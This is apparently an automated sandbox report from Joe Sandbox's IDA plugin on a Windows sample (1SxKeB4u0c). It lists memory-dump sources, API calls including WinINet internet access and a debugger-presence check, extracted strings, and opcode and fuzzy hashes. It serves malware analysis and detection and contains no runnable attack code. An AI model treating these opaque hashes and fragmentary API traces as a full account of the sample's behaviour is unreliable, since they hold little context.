                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset
                                                                              • String ID: |
                                                                              • API String ID: 1413715105-2343686810
                                                                              • Opcode ID: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                              • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                              • Opcode Fuzzy Hash: 57f61fd01a308bda18669db1d90637b579712718f35f37a6001f1c43c21cdce8
                                                                              • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                              • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                              • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                                              • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462911
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: c197747bc3b685acedd0e32849f7889b420d0f2a5673a073dabb367738ae49aa
                                                                              • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                              • Opcode Fuzzy Hash: c197747bc3b685acedd0e32849f7889b420d0f2a5673a073dabb367738ae49aa
                                                                              • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                              • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                              • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                              • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                              • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                              • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                              • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                              • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                              • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                              • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                              • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462A22
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                              • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                              • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                              • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                              • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                              • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                              • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • _wcscat.LIBCMT ref: 00444CB7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                              • String ID: SL
                                                                              • API String ID: 257928180-181245872
                                                                              • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                              • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                              • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                              • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                              • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                              • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                              • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_memmove
                                                                              • String ID: EA06
                                                                              • API String ID: 1988441806-3962188686
                                                                              • Opcode ID: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                              • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                              • Opcode Fuzzy Hash: 52e4c11e8ef934338f3706a5bab433cb38c03b7aa91e080fe40e6f8015fadc0b
                                                                              • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                              • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                              • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                              • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                              • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                              • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                              • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                              • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Init$ClearCopy_memmove
                                                                              • String ID: d}K
                                                                              • API String ID: 2932060187-3405784397
                                                                              • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                              • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                              • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                              • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                              • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                              • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                              • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                              APIs
                                                                                • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 3158253471-631824599
                                                                              • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                              • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                              • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
